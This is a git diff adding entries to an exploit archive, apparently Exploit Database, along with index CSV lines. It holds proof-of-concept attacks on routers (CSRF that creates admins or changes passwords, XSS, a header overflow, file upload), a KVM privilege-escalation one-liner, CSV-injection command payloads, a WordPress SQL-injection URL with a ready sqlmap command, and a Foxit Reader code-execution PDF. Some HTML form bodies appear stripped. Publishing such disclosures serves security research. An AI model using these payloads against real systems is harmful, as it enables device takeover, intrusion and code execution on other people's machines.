diff --git a/exploits/hardware/dos/44934.txt b/exploits/hardware/dos/44934.txt new file mode 100644 index 000000000..180810aa9 --- /dev/null +++ b/exploits/hardware/dos/44934.txt @@ -0,0 +1,20 @@ +# Exploit Title: DIGISOL DG-BR4000NG - Buffer Overflow (PoC) +# Date 2018-06-24 +# Vendor Homepage† http://www.digisol.com +# Hardware Link httpswww.amazon.inDigisol-DG-BR4000NG-Wireless-Broadband-802-11ndpB00A19EHYK +# Version: DIGISOL DG-BR4000NG Wireless Router +# Category Hardware +# Exploit Author Adipta Basu +# Tested on Mac OS High Sierra +# CVE CVE-2018-12706 + +# Reproduction Steps + +- Goto your Wifi Router Gateway [i.e http192.168.2.1] +- Go to -- General Setup -- Wireless -- Basic Settings +- Open BurpSuite +- Reload the Page +- Burp will capture the intercepts. +- Add a string of 500 ì0îs after the Authorization Basic string +- The router will restart. +- Refresh the page, and the whole web interface will be faulty. \ No newline at end of file diff --git a/exploits/hardware/webapps/44933.txt b/exploits/hardware/webapps/44933.txt new file mode 100644 index 000000000..ca16b5bc0 --- /dev/null +++ b/exploits/hardware/webapps/44933.txt @@ -0,0 +1,40 @@ +# Exploit Title:​​ Intex Router N-150 - Cross-Site Request Forgery (Add Admin) +# Date: 2018-06-23 +# Exploit Author: Navina Asrani +# Version: N-150 +# CVE : N/A +# Category: Router Firmware + +# 1. Description +# The firmware allows malicious request to be executed without verifying +# source of request. This leads to arbitrary execution with malicious request +# which will lead to the creation of a privileged user.. + +# 2. Proof of Concept +# Visit the application +# Go to any router setting modification page and change the values, +# create a request and observe the lack of CSRF tokens. +# Craft an html page with all the details for the built-in admin +# user creation and host it on a server +# Upon the link being clicked by a logged in admin user, +# immediately, the action will get executed +# Exploitation Technique: A attacker can create a rogue admin user to gain +# access to the application. + +# Exploit code: + + + +
+ + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44935.txt b/exploits/hardware/webapps/44935.txt new file mode 100644 index 000000000..e5de7efb8 --- /dev/null +++ b/exploits/hardware/webapps/44935.txt @@ -0,0 +1,20 @@ +# Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting +# Date: 2018-06-24 +# Vendor Homepage:  http://www.digisol.com +# Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK +# Category: Hardware +# Exploit Author: Adipta Basu +# Contact : https://www.facebook.com/AdiptaBasu +# Web: https://hackings8n.blogspot.com +# Tested on: Mac OS High Sierra +# CVE: CVE-2018-12705 +  +# Reproduction Steps: +  +- Goto your Wifi Router Gateway [i.e: http://192.168.2.1] +- Go to --> "General Setup" --> "Wireless" --> "Basic Settings" +- Open BurpSuite +- Change the SSID to "Testing" and hit "Apply" +- Burp will capture the intercepts. +- Now change the SSID to +- Refresh the page, and you will get the "ADIPTA" pop-up \ No newline at end of file diff --git a/exploits/hardware/webapps/44936.txt b/exploits/hardware/webapps/44936.txt new file mode 100644 index 000000000..b92ebe7ee --- /dev/null +++ b/exploits/hardware/webapps/44936.txt @@ -0,0 +1,54 @@ +# Exploit title: Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser) +# Date: 2018-05-21 +# Author: LiquidWorm +# Vendor: Ecessa Corporation +# Product web page: https://www.ecessa.com +# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24 + +# Summary: Ecessa's WANworX SD-WAN solutions increase network performance and +# reliability by leveraging any connection. That can be premium priced MPLS, +# lower cost broadband, or cellular 4G or LTE. Many of today’s WAN deployments +# are based on older technology that was acceptable when businesses did not run +# at breakneck speed or when operations didn’t grind to a halt when connectivity +# was disrupted. In today’s cloud-based applications, datacenters and distributed +# networks, where so much is virtualized and delivered as–a-service, limited +# bandwidth and network outages don’t just slow productivity, they stop it. + +# Desc: The application interface allows users to perform certain actions via +# HTTP requests without performing any validity checks to verify the requests. +# This can be exploited to perform certain actions with administrative privileges +# if a logged-in user visits a malicious web site. + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44937.txt b/exploits/hardware/webapps/44937.txt new file mode 100644 index 000000000..eedfcb04d --- /dev/null +++ b/exploits/hardware/webapps/44937.txt @@ -0,0 +1,28 @@ +# Exploit Title: AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password) +# Date: 2018-06-23 +# Exploit Author: Wadeek +# Vendor Homepage: https://www.asus.com/ +# Firmware Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC750GF/FW_RT_AC750GF_30043806038.zip +# Firmware Version: 3.0.0.4.380.6038 +# Tested on: ASUS RT-AC750GF with default firmware version 3.0.0.4.380.6038 + +# (Cross Site Scripting -> URL Redirecting -> Cross-Site Request Forgery {Cookie: asus_token} +# -> Change the router login password and enable SSH daemon) + + + +

Proof Of Concept

+ +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44938.txt b/exploits/hardware/webapps/44938.txt new file mode 100644 index 000000000..496347c71 --- /dev/null +++ b/exploits/hardware/webapps/44938.txt @@ -0,0 +1,48 @@ +# Exploit Title: Ecessa ShieldLink SL175EHQ 10.7.4 - Cross-Site Request Forgery (Add Superuser) +# Date: 2018-05-21 +# Vendor: Ecessa Corporation +# Product web page: https://www.ecessa.com +# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24 + +# Summary: Ecessa's ShieldLink 60, 175, 600,1200 & 4000 are advanced, yet highly +# affordable secure WAN Optimization Controllers that incorporate all of the ISP/WAN +# link. + +# Desc: The application interface allows users to perform certain actions via +# HTTP requests without performing any validity checks to verify the requests. +# This can be exploited to perform certain actions with administrative privileges +# if a logged-in user visits a malicious web site. + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44939.txt b/exploits/hardware/webapps/44939.txt new file mode 100644 index 000000000..da6f30197 --- /dev/null +++ b/exploits/hardware/webapps/44939.txt @@ -0,0 +1,17 @@ +# Exploit Title:​​ Intex Router N-150 - Arbitrary File Upload +# Date: 2018-06-23 +# Exploit Author: Samrat Das +# Version: N-150 +# CVE : N/A +# Category: Router Firmware + +# 1. Description +# The firmware allows malicious files to be uploaded without any checking of +# extensions and allows filed to be uploaded. + +# 2. Proof of Concept + +- Visit the application +- Go to the advanced settings post login +- Under backup- restore page upload any random file extension and hit go. +- Upon the file being upload, the firmware will get rebooted accepting the arbitrary file. \ No newline at end of file diff --git a/exploits/linux/dos/44944.txt b/exploits/linux/dos/44944.txt new file mode 100644 index 000000000..48ae5177f --- /dev/null +++ b/exploits/linux/dos/44944.txt @@ -0,0 +1,24 @@ +When KVM (on Intel) virtualizes another hypervisor as L1 VM it does not verify that VMX instructions from the L1 VM (which trigger a VM exit and are emulated by L0 KVM) are coming from ring 0. + +For code running on bare metal or VMX root mode this is enforced by hardware. However, for code running in L1, the instruction always triggers a VM exit even when executed with cpl 3. This behavior is documented by Intel (example is for the VMPTRST instruction): + +(Intel Manual 30-18 Vol. 3C) +IF (register operand) or (not in VMX operation) or (CR0.PE = 0) or (RFLAGS.VM = 1) or (IA32_EFER.LMA = 1 and CS.L = 0) + THEN #UD; +ELSIF in VMX non-root operation + THEN VMexit; +ELSIF CPL > 0 + THEN #GP(0); +ELSE + 64-bit in-memory destination operand ← current-VMCS pointer; + +This means that a normal user space program running in the L1 VM can trigger KVMs VMX emulation which gives a large number of privilege escalation vectors (fake VMCS or vmptrld / vmptrst to a kernel address are the first that come to mind). As VMX emulation code checks for the guests CR4.VMXE value this only works if a L2 guest is running. + +A somewhat realistic exploit scenario would involve someone breaking out of a L2 guest (for example by exploiting a bug in the L1 qemu process) and then using this bug for privilege escalation on the L1 system. + +Simple POC (tested on L0 and L1 running Ubuntu 18.04 4.15.0-22-generic). +This requires that a L2 guest exists: + +echo 'main(){asm volatile ("vmptrst 0xffffffffc0031337");}'| gcc -xc - ; ./a.out + +[ 2537.280319] BUG: unable to handle kernel paging request at ffffffffc0031337 \ No newline at end of file diff --git a/exploits/linux/webapps/44932.txt b/exploits/linux/webapps/44932.txt new file mode 100644 index 000000000..7ebba0143 --- /dev/null +++ b/exploits/linux/webapps/44932.txt @@ -0,0 +1,49 @@ +# Exploit Title: Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser) +# Author: LiquidWorm +# Date: 2018-05-21 +# Vendor: Ecessa Corporation +# Product web page: https://www.ecessa.com +# Affected version: 10.7.4, 10.6.9, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24 +# Tested on: lighttpd/1.4.35 + +# Summary: Internet Failover and Load Balancing for Small Businesses, Stores +# and Branch Offices. + +# Desc: The application interface allows users to perform certain actions via +# HTTP requests without performing any validity checks to verify the requests. +# This can be exploited to perform certain actions with administrative privileges +# if a logged-in user visits a malicious web site. + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/44931.txt b/exploits/php/webapps/44931.txt new file mode 100644 index 000000000..8b8883a76 --- /dev/null +++ b/exploits/php/webapps/44931.txt @@ -0,0 +1,27 @@ +# Exploit Title: Wordpress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection +# Google Dork: N/A +# Date: 2018-06-24 +# Exploit Author: Bhushan B. Patil +# Software Link: https://wordpress.org/plugins/woo-order-export-lite/ +# Affected Version: 1.5.4 and before +# Category: Plugins and Extensions +# Tested on: WiN7_x64 +# CVE: CVE-2018-11525 + +# 1. Application Description: +# The plugin helps you to easily export WooCommerce order data. Export any custom field assigned +# to orders/products/coupons is easy and you can select from various formats to export the data +# in such as CSV, XLS, XML and JSON. + +# 2. Technical Description: +# Advanced Order Export For WooCommerce plugin version 1.5.4 and before are affected by the vulnerability +# Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of +# form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, +# the command is executed. + +# 3. Proof Of Concept: + +Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit. + +# When high privileged user logs into the application to export form data in CSV and opens the file. +# Formula gets executed and calculator will get popped in his machine. \ No newline at end of file diff --git a/exploits/php/webapps/44940.txt b/exploits/php/webapps/44940.txt new file mode 100644 index 000000000..efd9ad9c5 --- /dev/null +++ b/exploits/php/webapps/44940.txt @@ -0,0 +1,22 @@ +# Exploit Title: Wordpress Plugin Comments Import & Export < 2.0.4 - CSV Injection +# Google Dork: N/A +# Date: 2018-06-24 +# Exploit Author: Bhushan B. Patil +# Software Link: https://wordpress.org/plugins/comments-import-export-woocommerce/ +# Affected Version: 2.0.4 and before +# Category: Plugins and Extensions +# Tested on: WiN7_x64 +# CVE: CVE-2018-11526 + +# 1. Application Description: +# Comments Import Export Plugin helps you to easily export and import Article and Product Comments in your store. + +# 2. Technical Description: +# WordPress Comments Import & Export plugin version 2.0.4 and before are affected by the vulnerability Remote Command Execution +# using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with +# higher privilege exports the form data in CSV opens the file on their machine, the command is executed. + +# 3. Proof Of Concept: +Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit. +When high privileged user logs into the application to export form data in CSV and opens the file. +Formula gets executed and calculator will get popped in his machine. \ No newline at end of file diff --git a/exploits/php/webapps/44943.txt b/exploits/php/webapps/44943.txt new file mode 100644 index 000000000..8eb6a0969 --- /dev/null +++ b/exploits/php/webapps/44943.txt @@ -0,0 +1,41 @@ +# Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection +# Date: 2018-06-25 +# Exploit Author: Çlirim Emini + +# Website: https://www.sentry.co.com/ +# Vendor Homepage: https://ithemes.com/ +# Software Link: https://wordpress.org/plugins/better-wp-security/ +# Version/s: 7.0.2 and below +# Patched Version: 7.0.3 +# CVE : 2018-12636 +# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099 + +Plugin description: + +iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress. + +Description: + +WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php. + +Technical details: + +Parameter orderby is vulnerable because backend variable $sort_by_column +is not escaped. + +File: better-wp-security/core/admin-pages/logs-list-table.php +Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) { +Line 272: $ sort_by_column = $_GET[' orderby ']; + +File: better-wp-security/core/lib/log-util.php +Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column )); + +Proof of Concept (PoC): + +The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin: + +http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0 + +Using SQLMAP: + +sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3 \ No newline at end of file diff --git a/exploits/windows/remote/44941.txt b/exploits/windows/remote/44941.txt new file mode 100644 index 000000000..3f265ee52 --- /dev/null +++ b/exploits/windows/remote/44941.txt @@ -0,0 +1,211 @@ +%PDF +1 0 obj +<> +2 0 obj +<> trailer <> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 900504871..ad814c3d0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5987,6 +5987,7 @@ id,file,description,date,author,type,platform,port 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows, 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple, 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux, +44944,exploits/linux/dos/44944.txt,"KVM (Nested Virtualization) - L1 Guest Privilege Escalation",2018-06-25,"Google Security Research",dos,linux, 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php, 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos, 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple, @@ -6005,6 +6006,7 @@ id,file,description,date,author,type,platform,port 44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, 44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux, 44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80 +44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -16583,6 +16585,7 @@ id,file,description,date,author,type,platform,port 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios, 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux, 44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22 +44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39540,6 +39543,7 @@ id,file,description,date,author,type,platform,port 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php, 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware, 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux, +44943,exploits/php/webapps/44943.txt,"WordPress Plugin iThemes Security < 7.0.3 - SQL Injection",2018-06-25,"Çlirim Emini",webapps,php,80 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php, 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php, 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php, @@ -39579,6 +39583,15 @@ id,file,description,date,author,type,platform,port 44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80 44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80 44922,exploits/php/webapps/44922.txt,"GreenCMS 2.3.0603 - Information Disclosure",2018-06-22,vr_system,webapps,php, -44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion",2018-06-21,ChaMd5,webapps,php, +44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)",2018-06-21,ChaMd5,webapps,php,80 44926,exploits/php/webapps/44926.txt,"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)",2018-06-22,"Berk Dusunur",webapps,php,80 -44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - Local File Inclusion",2018-06-22,VulnSpy,webapps,php,80 +44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)",2018-06-22,VulnSpy,webapps,php,80 +44931,exploits/php/webapps/44931.txt,"WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80 +44932,exploits/linux/webapps/44932.txt,"Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,linux,443 +44933,exploits/hardware/webapps/44933.txt,"Intex Router N-150 - Cross-Site Request Forgery (Add Admin)",2018-06-25,"Samrat Das",webapps,hardware,80 +44935,exploits/hardware/webapps/44935.txt,"DIGISOL DG-BR4000NG - Cross-Site Scripting",2018-06-25,"Adipta Basu",webapps,hardware,80 +44936,exploits/hardware/webapps/44936.txt,"Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,hardware,443 +44937,exploits/hardware/webapps/44937.txt,"AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)",2018-06-25,Wadeek,webapps,hardware,80 +44938,exploits/hardware/webapps/44938.txt,"Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,hardware,443 +44939,exploits/hardware/webapps/44939.txt,"Intex Router N-150 - Arbitrary File Upload",2018-06-25,"Samrat Das",webapps,hardware, +44940,exploits/php/webapps/44940.txt,"WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80